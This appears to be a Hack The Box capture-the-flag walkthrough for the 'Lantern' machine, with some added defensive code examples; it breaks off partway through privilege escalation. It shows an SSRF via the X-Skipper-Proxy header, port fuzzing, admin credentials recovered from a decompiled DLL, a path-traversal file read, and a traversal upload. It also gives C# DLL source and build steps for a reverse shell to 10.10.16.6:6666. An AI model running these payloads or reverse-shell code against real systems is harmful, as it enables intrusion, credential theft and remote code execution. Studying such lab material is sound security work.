Lantern
User
❯ nmap -A 10.129.10.189
Starting Nmap 7.95 ( https://nmap.org ) at 2024-08-21 19:52 CST
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 42.70% done; ETC: 19:53 (0:00:52 remaining)
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 90.93% done; ETC: 19:53 (0:00:08 remaining)
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 91.23% done; ETC: 19:53 (0:00:08 remaining)
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 91.43% done; ETC: 19:53 (0:00:08 remaining)
Nmap scan report for 10.129.10.189
Host is up (0.42s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:c9:47:d5:89:f8:50:83:02:5e:fe:53:30:ac:2d:0e (ECDSA)
|_ 256 d4:22:cf:fe:b1:00:cb:eb:6d:dc:b2:b4:64:6b:9d:89 (ED25519)
80/tcp open http Golang net/http server
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Length: 207
| Content-Type: text/html; charset=utf-8
| Date: Wed, 21 Aug 2024 11:53:47 GMT
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GenericLines, Help, LPDString, RTSPRequest, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Length: 225
| Content-Type: text/html; charset=utf-8
| Date: Wed, 21 Aug 2024 11:53:44 GMT
| Location: http://lantern.htb/
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to the target URL: <a href="http://lantern.htb/">http://lantern.htb/</a>. If not, click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: HEAD, OPTIONS, GET
| Content-Length: 0
| Content-Type: text/html; charset=utf-8
| Date: Wed, 21 Aug 2024 11:53:45 GMT
|_ Server: Skipper Proxy
|_http-title: Did not follow redirect to http://lantern.htb/
|_http-server-header: Skipper Proxy
3000/tcp open http Microsoft Kestrel httpd
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Kestrel
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.95%I=7%D=8/21%Time=66C5D548%P=arm-apple-darwin22.6.0%r(G
SF:etRequest,18F,"HTTP/1\.0\x20302\x20Found\r\nContent-Length:\x20225\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Wed,\x2021\x20A
SF:ug\x202024\x2011:53:44\x20GMT\r\nLocation:\x20http://lantern\.htb/\r\nS
SF:erver:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>
SF:\n<title>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\
SF:x20should\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x
SF:20URL:\x20<a\x20href=\"http://lantern\.htb/\">http://lantern\.htb/</a>\
SF:.\x20If\x20not,\x20click\x20the\x20link\.\n")%r(HTTPOptions,A5,"HTTP/1\
SF:.0\x20200\x20OK\r\nAllow:\x20HEAD,\x20OPTIONS,\x20GET\r\nContent-Length
SF::\x200\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Wed,
SF:\x2021\x20Aug\x202024\x2011:53:45\x20GMT\r\nServer:\x20Skipper\x20Proxy
SF:\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(FourOhFourRequest,162,"HTTP/1\.0\x20404\x20
SF:Not\x20Found\r\nContent-Length:\x20207\r\nContent-Type:\x20text/html;\x
SF:20charset=utf-8\r\nDate:\x20Wed,\x2021\x20Aug\x202024\x2011:53:47\x20GM
SF:T\r\nServer:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20la
SF:ng=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\n<p>T
SF:he\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\
SF:x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x2
SF:0your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(GenericLines,67,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20ch
SF:arset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(He
SF:lp,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
SF:se\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 146.31 seconds
80
The service on port 80 is written in Go.
❯ curl http://lantern.htb -I
HTTP/1.1 200 OK
Content-Length: 12049
Content-Type: text/html; charset=utf-8
Date: Fri, 23 Aug 2024 03:31:22 GMT
Server: Skipper Proxy
Reference: https://www.exploit-db.com/exploits/51111
Skipper Proxy has an SSRF: the HTTP request header X-Skipper-Proxy controls the target the proxy forwards the request to.
X-Skipper-Proxy: http://169.254.169.254
❯ python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.10.11.29 - - [23/Aug/2024 14:03:26] code 404, message File not found
::ffff:10.10.11.29 - - [23/Aug/2024 14:03:26] "GET http://lantern.htb:3000/evox/about HTTP/1.1" 404 -
The request that arrived shows that the final target is built from the Host header plus the original path.
ssrf-portScan
GET / HTTP/1.1
Host: lantern.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN
Connection: keep-alive
X-Skipper-Proxy: http://lantern.htb:8000
Fuzzing X-Skipper-Proxy: http://lantern.htb:FUZZ lets us probe ports.
❯ ffuf -request req -w port -c -v -t 1000 -request-proto http
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://lantern.htb/
:: Wordlist : FUZZ: /Users/a58/Documents/htb/machine/SeasonVI/linux/lantern/port
:: Header : Host: lantern.htb
:: Header : accept: */*
:: Header : User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
:: Header : Accept-Encoding: gzip, deflate, br
:: Header : Accept-Language: zh-CN
:: Header : X-Skipper-Proxy: http://lantern.htb:FUZZ
:: Header : Connection: keep-alive
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1000
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[Status: 500, Size: 22, Words: 3, Lines: 2, Duration: 2909ms]
| URL | http://lantern.htb/
* FUZZ: 22
[Status: 200, Size: 2847, Words: 334, Lines: 58, Duration: 2923ms]
| URL | http://lantern.htb/
* FUZZ: 3000
[Status: 200, Size: 1669, Words: 389, Lines: 50, Duration: 170ms]
| URL | http://lantern.htb/
* FUZZ: 5000
[Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 2984ms]
| URL | http://lantern.htb/
* FUZZ: 80
[Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 245ms]
| URL | http://lantern.htb/
* FUZZ: 8000
:: Progress: [1000/1000] :: Job [1/1] :: 2079 req/sec :: Duration: [0:00:03] :: Errors: 0 ::
The scan revealed two additional ports, 5000 and 8000 (the wordlist was the 1000 most common ports).
Port 8000 is actually the same application that port 80 serves.
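Detection logic for this header-based SSRF, as an added example that is not part of the write-up: it parses access-log lines that record the X-Skipper-Proxy value and flags (a) targets inside the perimeter (the proxy's own hostname, loopback, private and link-local addresses such as the 169.254.169.254 metadata address) and (b) a single client enumerating many ports on one host, which is what the ffuf run above looks like from the server side. The log format, the sample lines and the client addresses are constructed; Skipper's real access-log format is not assumed, so adapt LOG_RE to whatever the edge proxy actually emits.

```python
"""Flag SSRF abuse of a proxy-override header (X-Skipper-Proxy) in access logs.

Constructed example: the log format below is an assumption, not Skipper's
real access-log format."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Hostnames the proxy serves itself; a request that asks the proxy to fetch
# one of them (or a loopback/private/link-local address) never leaves the
# perimeter, which is the SSRF pattern used against this box.
OWN_HOSTS = {"lantern.htb", "localhost"}

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) '
    r'"X-Skipper-Proxy: (?P<target>[^"]*)"$'
)

# Constructed sample: one client enumerates ports on the proxy's own host and
# probes the cloud metadata address (one row still carries a fuzzing placeholder
# instead of a port); a second client sets a harmless external target.
SAMPLE_LOG = """\
2024-08-23T14:03:26Z 198.51.100.7 GET / "X-Skipper-Proxy: http://169.254.169.254"
2024-08-23T14:03:27Z 198.51.100.7 GET / "X-Skipper-Proxy: http://lantern.htb:22"
2024-08-23T14:03:27Z 198.51.100.7 GET / "X-Skipper-Proxy: http://lantern.htb:3000"
2024-08-23T14:03:27Z 198.51.100.7 GET / "X-Skipper-Proxy: http://lantern.htb:5000"
2024-08-23T14:03:27Z 198.51.100.7 GET / "X-Skipper-Proxy: http://lantern.htb:8000"
2024-08-23T14:03:27Z 198.51.100.7 GET / "X-Skipper-Proxy: http://lantern.htb:FUZZ"
2024-08-23T14:03:28Z 198.51.100.7 GET / "X-Skipper-Proxy: http://127.0.0.1:8080"
2024-08-23T14:05:00Z 203.0.113.9 GET / "X-Skipper-Proxy: http://cdn.example.org"
"""


def is_internal_target(url: str) -> bool:
    """True when the override URL points back inside the perimeter."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    if host.lower() in OWN_HOSTS:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # external hostname; DNS-rebinding checks are out of scope here
    return ip.is_loopback or ip.is_private or ip.is_link_local


def analyze(log_text: str, port_threshold: int = 3) -> dict:
    """Return internal-target hits and sources that enumerate ports on one host."""
    internal = []
    ports = defaultdict(set)  # (source, target host) -> distinct ports requested
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if is_internal_target(target):
            internal.append((m.group("src"), target))
        parts = urlsplit(target)
        if not parts.hostname:
            continue
        try:
            port = parts.port
        except ValueError:  # non-numeric port, e.g. a fuzzing placeholder
            continue
        port = port or (443 if parts.scheme == "https" else 80)
        ports[(m.group("src"), parts.hostname)].add(port)
    scanners = sorted(
        (src, host, len(seen))
        for (src, host), seen in ports.items()
        if len(seen) >= port_threshold
    )
    return {"internal_targets": internal, "port_scanners": scanners}


if __name__ == "__main__":
    for key, hits in analyze(SAMPLE_LOG).items():
        print(key)
        for hit in hits:
            print("  ", hit)
```

On the constructed sample the scan shows up as one source hitting four distinct ports on lantern.htb plus a metadata-address probe. The fix belongs at the edge: an internet-facing proxy should not honour a client-supplied target header at all, or should strip it before routing.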
GET /_framework/InternaLantern.dll HTTP/1.1
Host: lantern.htb:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN
Connection: keep-alive
X-Skipper-Proxy: http://lantern.htb:5000
Select the response and save it to a file,
or use curl:
❯ curl http://lantern.htb/_framework/InternaLantern.dll -H "X-Skipper-Proxy: http://lantern.htb:5000" -o InternaLantern.dll
On Windows the file can be decompiled with dnSpy, or use this decompiler, which has downloads for every platform:
Reference: https://decompiler.codemerx.com/
decompile
Inside there is a path to a db file; trying to access it fails.
base64-decode
The file also contains many base64-encoded strings; let's decode them.
SGVhZCBvZiBzYWxlcyBkZXBhcnRtZW50LCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBqb2huLnNAZXhhbXBsZS5jb20=
SFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGFubnkudEBleGFtcGxlLmNvbQ==
RnVsbFN0YWNrIGRldmVsb3BlciwgZW1lcmdlbmN5IGNvbnRhY3Q6ICs0NDEyMzQ1Njc4LCBlbWFpbDogY2F0aGVyaW5lLnJAZXhhbXBsZS5jb20=
UFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGxhcmEuc0BleGFtcGxlLmNvbQ==
SnVuaW9yIC5ORVQgZGV2ZWxvcGVyLCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBsaWxhLnNAZXhhbXBsZS5jb20=
U3lzdGVtIGFkbWluaXN0cmF0b3IsIEZpcnN0IGRheTogMjEvMS8yMDI0LCBJbml0aWFsIGNyZWRlbnRpYWxzIGFkbWluOkFKYkZBX1FAOTI1cDlhcCMyMi4gQXNrIHRvIGNoYW5nZSBhZnRlciBmaXJzdCBsb2dpbiE=
credential
Head of sales department, emergency contact: +4412345678, email: john.s@example.com
HR, emergency contact: +4412345678, email: anny.t@example.com
FullStack developer, emergency contact: +4412345678, email: catherine.r@example.com
PR, emergency contact: +4412345678, email: lara.s@example.com
Junior .NET developer, emergency contact: +4412345678, email: lila.s@example.com
System administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22. Ask to change after first login!
These credentials log in successfully to the admin panel of the service on port 3000.
There we can see the source code of app.py.
app.py
from flask import Flask, render_template, send_file, request, redirect, json
from werkzeug.utils import secure_filename
import os

app=Flask("__name__")

@app.route('/')
def index():
    # Requests for any other Host are bounced to the canonical name (the redirect nmap saw)
    if request.headers['Host'] != "lantern.htb":
        return redirect("http://lantern.htb/", code=302)
    return render_template("index.html")

@app.route('/vacancies')
def vacancies():
    return render_template('vacancies.html')

@app.route('/submit', methods=['POST'])
def save_vacancy():
    name = request.form.get('name')
    email = request.form.get('email')
    vacancy = request.form.get('vacancy', default='Middle Frontend Developer')
    if 'resume' in request.files:
        try:
            file = request.files['resume']
            resume_name = file.filename
            if resume_name.endswith('.pdf') or resume_name == '':
                # secure_filename() strips path separators, so this upload path is contained
                filename = secure_filename(f"resume-{name}-{vacancy}-latern.pdf")
                upload_folder = os.path.join(os.getcwd(), 'uploads')
                destination = '/'.join([upload_folder, filename])
                file.save(destination)
            else:
                return "Only PDF files allowed!"
        except:
            return "Something went wrong!"
    return "Thank you! We will conact you very soon!"

@app.route('/PrivacyAndPolicy')
def sendPolicyAgreement():
    # lang and ext come straight from the query string and are joined into a path
    # with no allow-list and no containment check: this is the arbitrary file read
    lang = request.args.get('lang')
    file_ext = request.args.get('ext')
    try:
        return send_file(f'/var/www/sites/localisation/{lang}.{file_ext}')
    except:
        return send_file(f'/var/www/sites/localisation/default/policy.pdf', 'application/pdf')

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8000)
LFI
This is the source of the port-80 application, and the PrivacyAndPolicy route has an arbitrary file read.
GET /PrivacyAndPolicy?lang=../../../../../../.&ext=/etc/hosts HTTP/1.1
Host: lantern.htb
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
❯ cat passwd |grep bash
root:x:0:0:root:/root:/bin/bash
tomas:x:1000:1000:tomas:/home/tomas:/bin/bash
Only two users have a shell: root and tomas.
After editing the contents of the "Choose Module" field and clicking Search, the following error is returned:
The path being loaded is /opt/components/…/…/…/…/…/…/…/…/…/etc/.dll.
Originally this field contained Logs, so the path loaded was /opt/components/Logs.dll.
/home/tomas/LanternAdmin/bin/Debug/net6.0/LanternAdmin.dll
Read this file with the LFI found above.
Analysis shows it implements the web application's log-retrieval feature.
So it loads and executes the file at /opt/components/ + our input + .dll.
So we need to write a malicious DLL and find a way to get it onto the target.
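Both path-construction flaws above (the lang/ext file read in app.py and the /opt/components/ + input + .dll loader) share one root cause: user input is joined onto a base directory with no containment check. Below is a hardened version of both lookups, added here as an example and not code from the box. The directory paths come from the page; the allow-lists (pdf as the only extension, Logs as the only module) and the name pattern are assumptions. The same resolve_under check is what a server should apply to an upload file name before writing it, the step the Blazor upload later abuses.

```python
"""Confine user-controlled file names to a base directory.

Hardened stand-ins for the two lookups on this box: the /PrivacyAndPolicy
route (lang + ext -> file under the localisation directory) and the module
loader (name -> /opt/components/<name>.dll). Allow-lists are assumptions."""
import os.path
import re
from pathlib import Path
from typing import Optional

LOCALISATION_DIR = Path("/var/www/sites/localisation")
DEFAULT_POLICY = LOCALISATION_DIR / "default" / "policy.pdf"
COMPONENTS_DIR = Path("/opt/components")

ALLOWED_EXT = {"pdf"}          # assumption: only the document type the route serves
ALLOWED_MODULES = {"Logs"}     # assumption: the one module the page shows shipping
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")   # bare names only: no separators, no dots


def resolve_under(base: Path, relative: str) -> Optional[Path]:
    """Join `relative` onto `base`; return None if the result escapes `base`.

    Normalisation is purely lexical so the check runs offline; on a live
    system also call Path.resolve() so symlinks cannot point outside `base`."""
    candidate = Path(os.path.normpath(base / relative))  # an absolute `relative` replaces base
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


def policy_file(lang: Optional[str], ext: Optional[str]) -> Path:
    """Safe replacement for sendPolicyAgreement's path construction:
    allow-list both parameters, then confine the joined path."""
    if not lang or not ext or not NAME_RE.match(lang) or ext not in ALLOWED_EXT:
        return DEFAULT_POLICY
    path = resolve_under(LOCALISATION_DIR, f"{lang}.{ext}")
    return path if path is not None else DEFAULT_POLICY


def component_path(module: Optional[str]) -> Optional[Path]:
    """Safe replacement for '/opt/components/' + input + '.dll'.

    Both checks apply: the name must be allow-listed (so a DLL smuggled into the
    directory, as in the write-up, still cannot be selected) and the joined
    path must stay inside COMPONENTS_DIR."""
    if not module or not NAME_RE.match(module) or module not in ALLOWED_MODULES:
        return None
    return resolve_under(COMPONENTS_DIR, f"{module}.dll")


if __name__ == "__main__":
    print(policy_file("en", "pdf"))
    print(policy_file("../../../../../../.", "/etc/hosts"))
    print(component_path("Logs"), component_path("../../../../etc/"))
```

Allow-listing the value is the primary control and the containment check is defence in depth: the second catches a traversal even if the first is ever relaxed, and neither relies on the attacker failing to find an encoding the other misses.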
how to Upload
First, work out how to upload a file.
The web application is built with the Blazor framework, which runs as WebAssembly.
Reference: https://www.aon.com/cyber-solutions/aon_cyber_labs/new_burp_suite_extension_blazortrafficprocessor/
That article explains that the Burp store offers an extension (BlazorTrafficProcessor) that converts Blazor stream data to JSON and JSON back to Blazor stream data.
Upload any file,
and capture the following two requests into Repeater.
Packet 1
This request carries the upload's metadata (file name, timestamp, size, etc.). Send it to the BTP extension
and deserialize it first.
Change name from ReverseBash.dll to …/…/…/…/…/…/…/…/…/…/…/…/…/…/opt/components/ReverseBash.dll
so that the traversal drops the file into /opt/components.
Then replace the body with the re-serialized content, replay packet 1, and then replay packet 2.
Packet 2
This request carries the actual file content.
The code of the uploaded file is below.
ReverseBash.cs
using System;
using System.Diagnostics;

namespace ReverseBash {
    class ReverseBash {
        public static void Main(string[] args) {
            // Spawns bash with a reverse-shell one-liner back to the attacking host
            Process proc = new System.Diagnostics.Process();
            proc.StartInfo.FileName = "bash";
            proc.StartInfo.Arguments = "-c \"bash -i >& /dev/tcp/10.10.16.6/6666 0>&1\"";
            proc.StartInfo.UseShellExecute = false;
            proc.StartInfo.RedirectStandardOutput = true;
            proc.Start();
            while (!proc.StandardOutput.EndOfStream) {
                Console.WriteLine(proc.StandardOutput.ReadLine());
            }
        }
    }
}
Compile with:
csc /target:library /out:ReverseBash.dll /platform:x64 ReverseBash.cs
After a successful upload, try loading the DLL.
It reports that the Component class is missing.
Going back to the Logs.dll downloaded earlier, its class is named Component and has a BuildRenderTree method, which the web app presumably calls.
So the malicious DLL has to follow the same layout as the downloaded one.
dotnet sdk
https://dotnet.microsoft.com/zh-cn/download/dotnet/thank-you/sdk-6.0.425-linux-x64-binaries
dotnet new classlib -n test
ReverseShell.cs
using System;
using System.Diagnostics;
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;

namespace test{
    public class Component : ComponentBase{
        // The host application loads the class named Component and calls
        // BuildRenderTree when it renders it, so the payload goes here
        protected override void BuildRenderTree(RenderTreeBuilder __builder) {
            Process proc = new System.Diagnostics.Process();
            proc.StartInfo.FileName = "bash";
            proc.StartInfo.Arguments = "-c \"bash -i >& /dev/tcp/10.10.16.6/6666 0>&1\"";
            proc.StartInfo.UseShellExecute = false;
            proc.StartInfo.RedirectStandardOutput = true;
            proc.Start();
            while (!proc.StandardOutput.EndOfStream) {
                Console.WriteLine(proc.StandardOutput.ReadLine());
            }
        }
    }
}
dotnet add package Microsoft.AspNetCore.Components --version 6.0.0 && \
dotnet add package Microsoft.AspNetCore.Components.Web --version 6.0.0
dotnet build -c release
Upload the DLL from bin/release/net6.0,
then load it.
Root
tomas@lantern:~$ sudo -l
Matching Defaults entries for tomas on lantern:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tomas may run the following commands on lantern:
(ALL : ALL) NOPASSWD: /usr/bin/procmon
tomas@lantern:~$
tomas@lantern:~$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Aug26 ? 00:00:05 /sbin/init
root 2 0 0 Aug26 ? 00:00:00 [kthreadd]
root 3 2 0 Aug26 ? 00:00:00 [rcu_gp]
root 4 2 0 Aug26 ? 00:00:00 [rcu_par_gp]
root 5 2 0 Aug26 ? 00:00:00 [slub_flushwq]
root 6 2 0 Aug26 ? 00:00:00 [netns]
root 8 2 0 Aug26 ? 00:00:00 [kworker/0:0H-events_highpri]
root 10 2 0 Aug26 ? 00:00:00 [mm_percpu_wq]
root 11 2 0 Aug26 ? 00:00:00 [rcu_tasks_rude_]
root 12 2 0 Aug26 ? 00:00:00 [rcu_tasks_trace]
root 13 2 0 Aug26 ? 00:00:00 [ksoftirqd/0]
root 14 2 0 Aug26 ? 00:00:04 [rcu_sched]
root 15 2 0 Aug26 ? 00:00:00 [migration/0]
root 16 2 0 Aug26 ? 00:00:00 [idle_inject/0]
root 18 2 0 Aug26 ? 00:00:00 [cpuhp/0]
root 19 2 0 Aug26 ? 00:00:00 [cpuhp/1]
root 20 2 0 Aug26 ? 00:00:00 [idle_inject/1]
root 21 2 0 Aug26 ? 00:00:00 [migration/1]
root 22 2 0 Aug26 ? 00:00:00 [ksoftirqd/1]
root 24 2 0 Aug26 ? 00:00:00 [kworker/1:0H-events_highpri]
root 25 2 0 Aug26 ? 00:00:00 [kdevtmpfs]
root 26 2 0 Aug26 ? 00:00:00 [inet_frag_wq]
root 27 2 0 Aug26 ? 00:00:00 [kauditd]
root 29 2 0 Aug26 ? 00:00:00 [khungtaskd]
root 30 2 0 Aug26 ? 00:00:00 [oom_reaper]
root 31 2 0 Aug26 ? 00:00:00 [writeback]
root 32 2 0 Aug26 ? 00:00:01 [kcompactd0]
root 33 2 0 Aug26 ? 00:00:00 [ksmd]
root 34 2 0 Aug26 ? 00:00:00 [khugepaged]
root 81 2 0 Aug26 ? 00:00:00 [kintegrityd]
root 82 2 0 Aug26 ? 00:00:00 [kblockd]
root 83 2 0 Aug26 ? 00:00:00 [blkcg_punt_bio]
root 84 2 0 Aug26 ? 00:00:00 [tpm_dev_wq]
root 85 2 0 Aug26 ? 00:00:00 [ata_sff]
root 86 2 0 Aug26 ? 00:00:00 [md]
root 87 2 0 Aug26 ? 00:00:00 [edac-poller]
root 88 2 0 Aug26 ? 00:00:00 [devfreq_wq]
root 89 2 0 Aug26 ? 00:00:00 [watchdogd]
root 91 2 0 Aug26 ? 00:00:00 [kworker/0:1H-kblockd]
root 93 2 0 Aug26 ? 00:00:00 [kswapd0]
root 94 2 0 Aug26 ? 00:00:00 [ecryptfs-kthrea]
root 96 2 0 Aug26 ? 00:00:00 [kthrotld]
root 97 2 0 Aug26 ? 00:00:00 [irq/24-pciehp]
root 98 2 0 Aug26 ? 00:00:00 [irq/25-pciehp]
root 99 2 0 Aug26 ? 00:00:00 [irq/26-pciehp]
root 100 2 0 Aug26 ? 00:00:00 [irq/27-pciehp]
root 101 2 0 Aug26 ? 00:00:00 [irq/28-pciehp]
root 102 2 0 Aug26 ? 00:00:00 [irq/29-pciehp]
root 103 2 0 Aug26 ? 00:00:00 [irq/30-pciehp]
root 104 2 0 Aug26 ? 00:00:00 [irq/31-pciehp]
root 105 2 0 Aug26 ? 00:00:00 [irq/32-pciehp]
root 106 2 0 Aug26 ? 00:00:00 [irq/33-pciehp]
root 107 2 0 Aug26 ? 00:00:00 [irq/34-pciehp]
root 108 2 0 Aug26 ? 00:00:00 [irq/35-pciehp]
root 109 2 0 Aug26 ? 00:00:00 [irq/36-pciehp]
root 110 2 0 Aug26 ? 00:00:00 [irq/37-pciehp]
root 111 2 0 Aug26 ? 00:00:00 [irq/38-pciehp]
root 112 2 0 Aug26 ? 00:00:00 [irq/39-pciehp]
root 113 2 0 Aug26 ? 00:00:00 [irq/40-pciehp]
root 114 2 0 Aug26 ? 00:00:00 [irq/41-pciehp]
root 115 2 0 Aug26 ? 00:00:00 [irq/42-pciehp]
root 116 2 0 Aug26 ? 00:00:00 [irq/43-pciehp]
root 117 2 0 Aug26 ? 00:00:00 [irq/44-pciehp]
root 118 2 0 Aug26 ? 00:00:00 [irq/45-pciehp]
root 119 2 0 Aug26 ? 00:00:00 [irq/46-pciehp]
root 120 2 0 Aug26 ? 00:00:00 [irq/47-pciehp]
root 121 2 0 Aug26 ? 00:00:00 [irq/48-pciehp]
root 122 2 0 Aug26 ? 00:00:00 [irq/49-pciehp]
root 123 2 0 Aug26 ? 00:00:00 [irq/50-pciehp]
root 124 2 0 Aug26 ? 00:00:00 [irq/51-pciehp]
root 125 2 0 Aug26 ? 00:00:00 [irq/52-pciehp]
root 126 2 0 Aug26 ? 00:00:00 [irq/53-pciehp]
root 127 2 0 Aug26 ? 00:00:00 [irq/54-pciehp]
root 128 2 0 Aug26 ? 00:00:00 [irq/55-pciehp]
root 129 2 0 Aug26 ? 00:00:00 [acpi_thermal_pm]
root 131 2 0 Aug26 ? 00:00:00 [scsi_eh_0]
root 132 2 0 Aug26 ? 00:00:00 [scsi_tmf_0]
root 133 2 0 Aug26 ? 00:00:00 [scsi_eh_1]
root 134 2 0 Aug26 ? 00:00:00 [scsi_tmf_1]
root 136 2 0 Aug26 ? 00:00:00 [vfio-irqfd-clea]
root 137 2 0 Aug26 ? 00:00:00 [mld]
root 138 2 0 Aug26 ? 00:00:00 [kworker/1:1H-kblockd]
root 139 2 0 Aug26 ? 00:00:00 [ipv6_addrconf]
root 150 2 0 Aug26 ? 00:00:00 [kstrp]
root 153 2 0 Aug26 ? 00:00:00 [zswap-shrink]
root 155 2 0 Aug26 ? 00:00:00 [kworker/u257:0]
root 160 2 0 Aug26 ? 00:00:00 [charger_manager]
root 205 2 0 Aug26 ? 00:00:00 [scsi_eh_2]
root 206 2 0 Aug26 ? 00:00:00 [mpt_poll_0]
root 207 2 0 Aug26 ? 00:00:00 [mpt/0]
root 208 2 0 Aug26 ? 00:00:00 [scsi_tmf_2]
root 209 2 0 Aug26 ? 00:00:00 [scsi_eh_3]
root 210 2 0 Aug26 ? 00:00:00 [scsi_tmf_3]
root 211 2 0 Aug26 ? 00:00:00 [scsi_eh_4]
root 212 2 0 Aug26 ? 00:00:00 [scsi_tmf_4]
root 213 2 0 Aug26 ? 00:00:00 [scsi_eh_5]
root 214 2 0 Aug26 ? 00:00:00 [ttm_swap]
root 215 2 0 Aug26 ? 00:00:00 [scsi_tmf_5]
root 216 2 0 Aug26 ? 00:00:00 [scsi_eh_6]
